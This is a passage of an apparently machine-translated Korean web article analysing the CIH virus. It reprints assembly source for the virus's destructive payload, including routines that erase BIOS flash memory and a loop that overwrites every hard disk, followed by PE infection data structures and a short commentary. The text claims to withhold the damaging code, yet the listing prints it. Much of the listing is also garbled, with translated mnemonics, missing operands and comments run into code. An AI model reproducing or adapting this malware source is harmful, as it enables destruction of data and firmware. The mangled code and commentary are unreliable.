>  기사  >  백엔드 개발  >  바이러스 프로그램 소스코드 예제 분석 - CIH 바이러스[5]

바이러스 프로그램 소스코드 예제 분석 - CIH 바이러스[5]

黄舟
黄舟원래의
2017-01-17 11:21:471898검색

바이러스 프로그램 소스코드 예시 분석-CIH 바이러스[5]

push ecx
loop $

; BIOS에서 추가 000E0000 - 000E007F 세그먼트 ROM 데이터를 삭제합니다. 총 80시간 바이트입니다.
xor ah, ah
mov [eax], al
 
 xchg ecx, eax
 loop $
 
 ; BIOS의 000E0000 - 000FFFFF 세그먼트 데이터를 표시하고 활성화합니다. 총 128KB입니다. 이 세그먼트는 mov eax, 0f5555h 정보를 쓸 수 있습니다.
Pop ecx
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h

loop $

000FE000 - 000FE07F 세그먼트 데이터 삭제; BIOS의 총 80h 바이트
mov ah, 0e0h
mov [eax], al

; BIOS의 000F0000 - 000FFFFF 섹션 숨기기, 총 64KB
mov word ptr ( BooleanCalculateCode-@10) [esi], 100ch
esi 호출

모든 하드 드라이브 삭제
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDiskNumber
push ebx
sub esp, 2ch
push 0c0001000h
mov bh, 08h
push ebx
push ecx
push ecx
push ecx
push 40000501h
inc ecx
push ecx
push ecx

mov esi, esp
sub esp, 0ach

루프를 파괴
LoopOfKillHardDisk:
int 20h
dd 00100004h
 
cmp word ptr [esi+06h], 0017h
je KillNextDataSection

;ChangeNextHardDisk:
inc byte ptr [esi+4dh]

jmp LoopOfKillHardDisk
 
 ;다음 영역 파괴
 KillNextDataSection:
 add dword ptr [esi+10h], ebx
 mov byte ptr [esi+4dh], FirstKillHardDiskNumber
 
jmp LoopOfKillHardDisk

EEPROM을 활성화하여 정보 쓰기
EnableEEPROMToWrite:
mov [eax], cl
mov [ecx], al
mov byte ptr [eax], 80h
mov [eax ], cl
mov [ecx], al

ret

IOForEEPROM:
@10 = IOForEEPROM

xchg eax, edi
xchg edx, ebp
출력 dx, eax

xchg eax, edi
al , 44h
 
xchg eax, edi
xchg edx, ebp
출력 dx, eax

xchg eax, edi
, al
 
 ret
 
 ;정적 데이터 정의
 LastVxdCallAddress = IFSMgr_Ring0_FileIO;마지막 호출된 Vxd 명령어 주소
 VxdCallAddressTable DB 00h
 db IFSMgr_RemoveFileSystem ApiHook-_PageAllocate
 db UniToBCSPath- IFSMgr_RemoveFileSystemApiHook
db IFSMgr_Ring0_FileIO-UniToBCSPath ;각 Vxd 호출 명령어의 주소 차이
xd의 호출 번호
VxdCallTable 크기 = ($-VxdCallIDTable)/04h ; 프로그램
 
;바이러스 버전 및 저작권 정보 정의
VirusVersionCopyright db 'CIH v';CIH 바이러스 식별
db MajorVirusVersion+'0';기본 버전 번호
에 사용된 Vxd 호출 횟수 db '.'
db MinorVirusVersion+'0' ; 마이너 버전 번호
db ' TATUNG' ; 바이러스 크기
VirusSize = $ + SizeOfVirusCodeSectionTableEndMark(04h) + NumberOfSections *SizeOfVirusCodeSectionTable(08h)
+ SizeOfTheFirstVirusCodeSectionTable(04h)

; 동적 데이터 정의
VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress ; 바이러스 데이터 시작 주소

OnBusy db 0; "사용 중" 플래그
FileModificationTime dd ? DataBuffer
NumberOfSections dw ? 파일 시간
SymbolsPointer dd ? dd ? SizeOfOptionalHeader dw ? ;선택적 헤더의 길이
_Characteristics dw ? ;문자 집합 플래그
매직 dw ;플래그 단어(항상 010bh)
링커 버전 번호
SizeOfCode ?
SizeOfInitializedData dd ? 초기화되지 않은 데이터 블록 크기
BaseOfCode dd ;
 BaseOfData dd ? 데이터 섹션 시작 RVA
 ImageBase dd ? 기본 주소 로드 RVA
 
 @9 = $
 SectionAlignment dd ;FileAlignment dd ? alignment
 OperatingSystemVersion dd ? 필수 운영 체제 버전 번호
 ImageVersion dd ? 사용자 정의 버전 번호
 SubsystemVersion dd ? 필수 하위 시스템 버전 번호
 Reserved dd ? ; 파일의 각 부분의 총 길이
SizeOfHeaders dd ? 파일 헤더 크기
SizeOfImageHeaderToRead = $-NumberOfSections
NewAddressOfEntryPoint = DataBuffer
SizeOfImageHeaderToWrite = 04h
 
StartOfSectionTable=@9 > PointerToRawData = StartOfSectionTable+14h; 블록 물리적 오프셋
PointerToRelocations = StartOfSectionTable+18h; 재배치 오프셋
PointerToLineNumbers = StartOfSectionTable+1ch; 줄 번호 테이블 오프셋
NumberOfRelocations = StartOfSectionTable+20h; NumberOfLinenNmbers = StartOfSectionTable+22h ; 행 번호 테이블 수
Characteristics = StartOfSectionTable+24h ; 블록 속성
SizeOfScetionTable = Characteristics+04h-SectionName ; 메모리 양 바이러스에 필요함
VirusNeedBaseMemory = $
VirusNeedBaseMemory = $

VirusTotalNeedMemory = @9
; + SizeOfVirusCodeSectionTableEndMark(04h)
+ NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; END FileHeader
위의 코드 분석 과정을 통해 CIH 바이러스는 명확한 구조와 뚜렷한 계층을 가지고 있음을 알 수 있습니다. 이 바이러스 프로그램의 백본 구조는 바이러스의 세부 사항이 win95 방식에 따라 처리되고 모든 시스템 호출이 Vxd를 사용하여 이루어진다는 점을 제외하면 DOS 바이러스의 백본 구조와 매우 유사합니다. 이는 Windows에서 API 기능을 사용하는 것과 비교하여 바이러스 프로그램을 더 낮은 수준으로, 더 효율적으로 만들고, 인터럽트를 사용하는 것에 비해 바이러스 자체의 복잡한 재배치 프로세스를 고려할 필요가 없으며 더 잘 예방할 수 있습니다. 프로그램 추적.

CIH 바이러스에는 두 가지 혁신이 있습니다. 하나는 바이러스가 감염되면 감염된 파일의 블록 사이의 빈 공간을 찾아 그 안에 바이러스 고유의 다양한 데이터 구조와 코드를 쓰는 것입니다. 충분하지 않으며 전염성이 없으므로 일부 파일이 감염되지 않는 이유 중 하나입니다.) 둘째, 바이러스는 공격할 때 플래시 메모리를 태울 뿐만 아니라 하드 디스크를 파괴하여 컴퓨터 하드웨어를 손상시킬 수 있습니다.

보안상의 이유로 바이러스 공격을 유발하고 하드웨어를 손상시키는 코드 부분에 대한 자세한 분석을 제공하지 않았습니다.




위 내용은 바이러스 프로그램 소스코드 예제 분석-CIH 바이러스[5]의 내용이며, 더 많은 관련 내용은 PHP 중국어 홈페이지(www. php.cn)!



성명:
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.